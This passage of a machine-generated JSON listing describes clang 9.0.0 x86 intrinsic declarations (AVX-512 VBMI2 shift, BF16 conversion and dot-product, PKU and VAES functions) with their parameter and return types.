"parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:502:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:517:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:525:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:540:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:548:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:555:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:563:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:571:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:578:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:594:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:601:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:609:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:617:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:624:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:640:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:647:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:655:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:663:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:670:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:678:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "typedef", "ns": 0, "name": "__m512bh", "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:16:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256bh", "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:17:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__bfloat16", "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:18:24", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "function", "name": "_mm_cvtsbh_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:36:44", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__bfloat16" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:53:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512bh" } }, { "tag": "function", "name": "_mm512_mask_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512bh" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512bh" } }, { "tag": "function", "name": "_mm512_maskz_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:98:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512bh" } }, { "tag": "function", "name": "_mm512_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m256bh" } }, { "tag": "function", "name": "_mm512_mask_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:135:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256bh" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m256bh" } }, { "tag": "function", "name": "_mm512_maskz_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m256bh" } }, { "tag": "function", "name": "_mm512_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:175:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__D", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512bh" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:199:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__D", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512bh" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:223:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512bh" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvtpbh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:236:48", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256bh" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_cvtpbh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:252:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256bh" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_cvtpbh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:270:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256bh" } }], "return-type": { "tag": "__m512" } }, { "tag": "typedef", "ns": 0, "name": "__m128bh", "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:16:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "_mm_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:38:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm_mask_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128bh" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm_maskz_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:83:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm256_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256bh" } }, { "tag": "function", "name": "_mm256_mask_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:125:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256bh" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256bh" } }, { "tag": "function", "name": "_mm256_maskz_cvtne2ps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:147:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256bh" } }, { "tag": "function", "name": "_mm_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:164:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm_mask_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128bh" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm_maskz_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:206:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm256_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:222:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm256_mask_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:243:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128bh" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm256_maskz_cvtneps_pbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:262:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m128bh" } }, { "tag": "function", "name": "_mm_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:283:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__D", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128bh" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:307:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__D", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128bh" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:331:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128bh" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:352:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__D", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256bh" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:376:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__D", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256bh" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_dpbf16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256bh" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256bh" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_cvtness_sbh", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:416:52", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__bfloat16" } }, { "tag": "function", "name": "_mm256_cvtpbh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:430:48", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128bh" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_cvtpbh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128bh" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_cvtpbh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:465:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128bh" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_rdpkru_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pkuintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_wrpkru", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pkuintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__val", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_aesenc_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:25:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_aesenc_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:32:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm256_aesdec_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:39:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_aesdec_epi128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:46:2", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", 